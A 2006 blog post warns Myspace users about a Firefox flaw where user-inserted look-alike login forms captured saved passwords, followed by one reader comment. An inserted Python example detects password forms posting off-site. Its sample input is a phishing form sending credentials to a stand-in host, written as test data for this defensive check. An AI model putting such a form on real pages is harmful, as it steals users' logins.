Wednesday, November 22, 2006

Yikes

I've got better things to do than hang out on Myspace but I know the same cannot be said for many of you. So be very careful out there if you're using Firefox as this vulnerability has just come out, with no fix as yet. It's so simple, it's genius. Websites like Myspace allow users to put their own HTML into the webpage, and this particular attack used a legitimate-looking Myspace login form to steal your username and password - even though the form was getting posted to a completely different site.

The same potential exists on any website that allows users to craft pages with HTML, not to mention the traditional phishing websites.
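For a site that accepts user HTML, the mismatch described above (a password form whose action points at another site) can be checked before the content is published. The following is an added example, not code from this post or from any site mentioned in it; the host names, `SAMPLE` and `PAGE` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormAudit(HTMLParser):
    """Records each <form> in a user-supplied fragment: its resolved
    action URL and whether it contains a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []      # one dict per <form> seen
        self._open = None    # the form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # A missing or empty action posts back to the page itself.
            action = urljoin(self.page_url, a.get("action", "").strip())
            self._open = {"action": action, "password": False}
            self.forms.append(self._open)
        elif tag == "input" and a.get("type", "").strip().lower() == "password":
            if self._open is not None:
                self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def origin(url):
    # Conservative comparison: scheme plus the full host[:port] string.
    p = urlsplit(url)
    return (p.scheme, p.netloc.lower())


def offsite_password_forms(fragment, page_url):
    """Return the action URLs of password forms that post to another origin."""
    audit = FormAudit(page_url)
    audit.feed(fragment)
    audit.close()
    site = origin(page_url)
    return [f["action"] for f in audit.forms
            if f["password"] and origin(f["action"]) != site]


# Constructed sample input: a profile fragment with a look-alike login form.
SAMPLE = """<div><form action="https://collector.example/login" method="post">
<input name="email"><input type="password" name="pw"></form></div>"""
PAGE = "https://social.example/profile/123"  # hypothetical host site
```

Calling `offsite_password_forms(SAMPLE, PAGE)` returns the off-site action URL. Stripping form elements from user content altogether is the stricter option; this check only shows what the mismatch looks like.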

Personally I'm not going to stop letting Firefox save my passwords, but I shall be very careful until this is fixed.

I bet Microsoft are feeling pretty smug right now. Or maybe not...

1 comment:

bagelmouse said...

It also affects IE; though I suppose if you're still using IE you deserve everything that's coming to you.

Damn work and their obsession with uniformity.